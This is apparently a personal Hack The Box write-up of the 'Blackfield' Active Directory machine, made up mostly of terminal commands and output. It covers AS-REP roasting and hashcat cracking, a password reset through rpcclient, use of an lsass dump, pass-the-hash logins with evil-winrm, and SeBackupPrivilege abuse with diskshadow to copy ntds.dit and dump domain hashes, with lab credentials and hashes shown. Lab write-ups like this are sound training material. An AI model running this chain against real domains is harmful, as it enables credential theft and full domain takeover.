
   |  ~/cybersecurity/htb/boxes/ ············································ 20:30:55   ─╮
❯ hashcat -m 18200 --force -a 0 asreproast.hashes /usr/share/wordlists/rockyou.txt                                   ─╯
hashcat (v6.1.1) starting...

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: pthread-AMD Ryzen 5 1600 Six-Core Processor, 5853/5917 MB (2048 MB allocatable), 6MCU

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344394
* Bytes.....: 139921525
* Keyspace..: 14344387
* Runtime...: 2 secs

Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:2fba12a1aaf1...7e2da8
Time.Started.....: Tue Sep 15 20:32:01 2020, (13 secs)
Time.Estimated...: Tue Sep 15 20:32:14 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1057.8 kH/s (10.17ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344387/14344387 (100.00%)
Rejected.........: 0/14344387 (0.00%)
Restore.Point....: 14327808/14344387 (99.88%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $CaRaMeL -> clarus
Started: Tue Sep 15 20:31:36 2020
Stopped: Tue Sep 15 20:32:16 2020

 Got it!


Now, can I log in with winrm? Nope, no login that way, that would be too easy lol. I guess I'll redo enum4linux but authenticated this time.

   |  ~/cybersecurity/htb/boxes/ ············································ 20:37:31   ─╮
❯ enum4linux -a -M -l -d -w BLACKFIELD.local -u support -p "#00^BlackKnight" blackfield.htb 2>&1 | tee "/home/borari/cyb
Starting enum4linux v0.8.9 ( []( ) on Tue Sep 15 20:37:56 2020

|    Target Information    |
Target ........... blackfield.htb
RID Range ........ 500-550,1000-1050
Username ......... 'support'
Password ......... '#00^BlackKnight'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

Hooo boy that's a ton of shit. Here's some of what I think is interesting.

[+] Got OS info for blackfield.htb from srvinfo:
        platform_id     :       500
        os version      :       10.0
        server type     :       0x80102b

|    Users on blackfield.htb    |
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administerin>index: 0xfb0 RID: 0x44f acb: 0x00000210 Account: audit2020      Name: (null)    Desc: (null)
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10eb RID: 0x586 acb: 0x00000210 Account: lydericlefebvre       Name: Lydéric aas. Lefebvre     Desc:@lydericlefebvre - VM Creator
index: 0xfb1 RID: 0x450 acb: 0x00010210 Account: support        Name: (null)    Desc: (null)
index: 0x10e6 RID: 0x585 acb: 0x00000210 Account: svc_backup    Name: (null)    Desc: (null)

I'll need to grep for 'Account: ' then do some awk slicing to get an actual user list.

Ok, got it. Let's see if we can get anyone else's ASREP ticket. Nope, only the one for support came back.

Do I have any deeper access to the SMB shares? Yes, I have more RO access than I did before.

   |  ~/cybersecurity/htb/boxes/ ··································· 15s    20:55:05   ─╮
❯ smbmap -H blackfield.htb -P 445 2>&1 | tee -a "/home/borari/cybersecurity/htb/boxes/"; smbmap -u support -p "#00^BlackKnight" -H blackfield.htb -P 445 2>&1 | tee -a "/home/borari/cybersecurity/htb/boxes/"

[+] IP: blackfield.htb:445      Name: unknown
[+] IP: blackfield.htb:445      Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share

Let's see what is on these other shares. Nothing on NETLOGON.

Ok, I have a valid domain account, what else can I do? Can I go kerberoasting? Nope.

What else can I do, or have I not tried to do? RPC, I always forget about RPC.

   |  ~/cybersecurity/htb/boxes/ ···································· INT ✘  21:21:35   ─╮
❯ rpcclient -U support                                                                                  ─╯
Enter WORKGROUP\support's password:

rpcclient $> enumprivs
found 35 privileges
SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)

I got a direct hint that I could change a user's password with rpcclient. I guess the SeTrustedCredManAccessPrivilege and stuff is what should have given it away?

I update the password for user audit2020. I can now log in to the profiles$ smb share.

rpcclient $> setuserinfo2 audit2020 23 'Password_1234'

   |  ~/cybersecurity/htb/boxes/ ············································ 21:52:26   ─╮
❯ smbclient [\\\\\\profiles$](file:///$) -U audit2020                                                                 ─╯
Enter WORKGROUP\audit2020's password:

Try "help" to get a list of possible commands.
smb: \>

Let's enum this users directory. Nothing.

smb: \\\> cd audit2020
smb: \\audit2020\\\> ls
. D 0 Wed Jun 3 12:47:11 2020
.. D 0 Wed Jun 3 12:47:11 2020
7846143 blocks of size 4096. 4081176 blocks available
smb: \\audit2020\\\>

Do we have access to any other shares?

   |  ~/cybersecurity/htb/boxes/ ································ 1m 34s    21:54:14   ─╮
❯ smbmap -H blackfield.htb -P 445 2>&1 | tee -a "/home/borari/cybersecurity/htb/boxes/"; smbmap -u audit2020 -p "Password_1234" -H blackfield.htb -P 445 2>&1 | tee -a "/home/borari/cybersecurity/htb/boxes/"

[+] IP: blackfield.htb:445      Name: unknown
[+] IP: blackfield.htb:445      Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                READ ONLY       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share

Yeah, I seem to have access to the forensic share now. Let's see what's on there.

❯ smbclient [\\\\\\forensic](file:/// -U audit2020                                                                  ─╯
Enter WORKGROUP\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Sun Feb 23 08:03:16 2020
  ..                                  D        0  Sun Feb 23 08:03:16 2020
  commands_output                     D        0  Sun Feb 23 13:14:37 2020
  memory_analysis                     D        0  Thu May 28 16:28:33 2020
  tools                               D        0  Sun Feb 23 08:39:08 2020

There's a ton of shit, I should just mount the share.

   |  ~/cybersecurity/htb/boxes/ ··································· 13s    21:59:10   ─╮
❯ mount -t cifs // /mnt -o user=audit2020                                                       ─╯
🔐 Password for audit2020@//  *************

While searching through all these files, it looked like this is the actions log of someone doing a security audit or something. The tools folder is useless to me, its just program data. The commands log folder looks to be just basic enumeration. The memory analysis folder looks juicy though. I know that lsass deals with security and shit, and can hold hashed credentials, that's what's targeted my mimikatz. I'll copy that over and try to use mimikatz to pull anything there out.

     /mnt/memory_analysis ········································································· 22:05:00   ─╮
❯ cp ~/cybersecurity/htb/boxes/                                                ─╯

     /mnt/memory_analysis ································································ 18s    22:07:59   ─╮
❯ cd ~/cybersecurity/htb/boxes/

   |  ~/cybersecurity/htb/boxes/ ······································· 22:08:12   ─╮
❯ unzip                                                                                                    ─╯
  inflating: lsass.DMP

I really don't want to fuck around with trying to figure out if I can run mimikatz on my kali machine or anything, so I'll just boot up in to my Windows exploit-dev machine to do it.

Can I pass the administrator hash to winrm and just get root? lol no.

   |  ~/cybersecurity/htb/boxes/ ···································· INT ✘  22:03:33   ─╮
❯ evil-winrm -i -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62                                    ─╯

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

Can I pass the svc_backup hash? Yes! Do I have the right user account? Yes!

   |  ~/cybersecurity/htb/boxes/ ··································· 21s    22:23:48   ─╮
❯ evil-winrm -i -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d                                       ─╯

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_backup\Documents> ls -force ..\Desktop

    Directory: C:\Users\svc_backup\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a-hs-        2/23/2020   9:16 AM            282 desktop.ini
-ar---        9/15/2020  11:10 PM             34 user.txt

User Compromise

EoP Enumeration

What privileges do I have?

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all


User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Cool, I'm part of the Backup Operators group, and I have SeBackupPrivilege. Check out this link for a deeper explanation, but I can basically back up anything I want. This includes AD files, registry files, etc. This means that I can just back up NTDS.dit, which is the Windows domain equivalent to /etc/shadow, it holds password hashes for all the users in a domain.

In the following steps, what I am doing is using diskshadow to make a new volume and alias it with C:\. This will allow me to read everything on C:\, regardless of my permissions. It will be easier to script it since I don't have a fully interactive shell.

   |  ~/cybersecurity/htb/boxes/ ······················ 32s       22:41:26   ─╮
❯ cat script.txt                                                                                                     ─╯
add volume c: alias audit
expose %audit% z:

*Evil-WinRM* PS C:\windows\temp> upload exploit/script.txt
Info: Uploading exploit/script.txt to C:\windows\temp\script.txt

Data: 116 bytes of 116 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\temp> type script.txt
add volume c: alias auditp
expose %audit% z:p

*Evil-WinRM* PS C:\windows\temp> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  9/19/2020 2:32:34 PM

-> add volume c: alias audit
-> create
Alias audit for shadow ID {f3b47f4a-dd72-473f-be5d-b027089ca475} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {25b8692c-4b67-47ef-b32b-09de1eb8df15} set as environment variable.

Querying all shadow copies with the shadow copy set ID {25b8692c-4b67-47ef-b32b-09de1eb8df15}

        * Shadow copy ID = {f3b47f4a-dd72-473f-be5d-b027089ca475}               %audit%
                - Shadow copy set: {25b8692c-4b67-47ef-b32b-09de1eb8df15}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: [\\?\Volume{351b4712-0000-0000-0000-602200000000}\](file:///%3f/Volume%7b351b4712-0000-0000-0000-602200000000%7d/) [C:\]
                - Creation time: 9/19/2020 2:32:35 PM
                - Shadow copy device name: [\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1](file:///%3f/GLOBALROOT/Device/HarddiskVolumeShadowCopy1)
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %audit% z:
-> %audit% = {f3b47f4a-dd72-473f-be5d-b027089ca475}
The shadow copy was successfully exposed as z:\.

In order to allow me to copy the NTDS.dit file, I just need to download the two DLLs from ( on to the machine and import them in PS.

*Evil-WinRM* PS C:\windows\temp> upload exploit/SeBackupPrivilegeCmdLets.dll
Info: Uploading exploit/SeBackupPrivilegeCmdLets.dll to C:\windows\temp\SeBackupPrivilegeCmdLets.dll

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\temp> upload exploit/SeBackupPrivilegeUtils.dll
Info: Uploading exploit/SeBackupPrivilegeUtils.dll to C:\windows\temp\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\windows\temp> Import-Module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\windows\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll

Now I should be good to copy the NTDS.dit file over to my current directory, then download it to my host. This is the functional equivalent of dumping the ntlm, system, and sam registry hives.

*Evil-WinRM* PS C:\windows\temp> Copy-FileSeBackupPrivilege z:\Windows\NTDS\ntds.dit C:\Windows\temp\audit.dit
*Evil-WinRM* PS C:\windows\temp> ls -force

    Directory: C:\windows\temp

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/19/2020   2:32 PM            628
-a----        9/19/2020   2:37 PM       18874368 audit.dit
-a----        9/19/2020   2:30 PM         130890 MpCmdRun.log
-a----        9/19/2020   2:31 PM             88 script.txt
-a----        9/19/2020   2:33 PM          12288 SeBackupPrivilegeCmdLets.dll
-a----        9/19/2020   2:33 PM          16384 SeBackupPrivilegeUtils.dll
-a----        9/19/2020   2:20 PM            102 silconfig.log
------        9/19/2020   2:20 PM          62794 vmware-vmsvc.log
------        9/19/2020   2:20 PM          15832 vmware-vmusr.log
-a----        9/19/2020   2:19 PM           1728 vmware-vmvss.log

*Evil-WinRM* PS C:\windows\temp> download audit.dit
Info: Downloading C:\windows\temp\audit.dit to audit.dit

Info: Download successful!

And I also need to dump the SYSTEM file.

*Evil-WinRM* PS C:\windows\temp> reg save HKLM\SYSTEM system
The operation completed successfully.

*Evil-WinRM* PS C:\windows\temp> download system
Info: Downloading C:\windows\temp\system to system

Info: Download successful!

I couldn't have dumped the reg hives the traditional post SYSTEM compromise way because I don't have access to the HKLM\SECURITY node. However, I can rebuild the hashes with Impacket's in the same fashion. (Shit, there's a lot, but that aad3b is null so yeah.

   |  ~/cybersecurity/htb/boxes/ ······································· 11:13:42   ─╮
❯ -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -output nt.hashes                         ─╯
Impacket v0.9.22.dev1+20200909.150738.15f3df26 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit

I should be able to pass this hash directly to evil-winrm to log in, but I also like cracking hashes when I can, so I'll clean up the output real quick so I can do that later.

   |  ~/cybersecurity/htb/boxes/ ······································· 11:19:33   ─╮
❯ cat nt.hashes.ntds | awk -F ":" '{print $1":"$4}' > nt.hashes                                                      ─╯

   |  ~/cybersecurity/htb/boxes/ ······································· 11:19:56   ─╮
❯ head nt.hashes                                                                                                     ─╯

Before trying to crack anything I am going to log in as Administrator to get the flags and finish owning the box.

   |  ~/cybersecurity/htb/boxes/ ····························· 1h 1m 22s    11:21:22   ─╮
❯ evil-winrm -i -u administrator -H 184fb5e5178480be64824d4cd53b99ee                                    ─╯

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>

That's it! I just finished this machine!

SYSTEM Compromise


Now to attempt to crack the recovered hashes with hashcat.

   |  ~/cybersecurity/htb/boxes/ ···························· 1m 4s    11:51:26   ─╮
❯ hashcat -m 1000 -a 0 --username nt.hashes /usr/share/wordlists/rockyou.txt -r ~/cybersecurity/Tools/host-tools/wordlists/hob064.rule
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
* Device #1: pthread-AMD Ryzen 5 1600 Six-Core Processor, 5853/5917 MB (2048 MB allocatable), 6MCU

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344387
* Bytes.....: 139921525
* Keyspace..: 918040768

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: NTLM
Hash.Target......: nt.hashes
Time.Started.....: Sat Sep 19 11:52:59 2020 (38 secs)
Time.Estimated...: Sat Sep 19 11:53:37 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Mod........: Rules (/home/borari/cybersecurity/Tools/host-tools/wordlists/hob064.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 24386.8 kH/s (7.03ms) @ Accel:512 Loops:64 Thr:1 Vec:8
Recovered........: 2/26 (7.69%) Digests
Progress.........: 918040768/918040768 (100.00%)
Rejected.........: 0/918040768 (0.00%)
Restore.Point....: 14344387/14344387 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-64 Iteration:0-64
Candidates.#1....: !!sexme!! -> cl@ru$16

Started: Sat Sep 19 11:52:38 2020
Stopped: Sat Sep 19 11:53:38 2020

Looks like I got one, the same one I had before. Also I confirmed that the 31d6cf... LM hash is the null value, so I can grep -v that one out of my list before I pipe it over to my master hashes list. (Actually I just removed all the system accounts and all the identical hash value random noise users as well to keep my list more manageable.)

Next: Unbalanced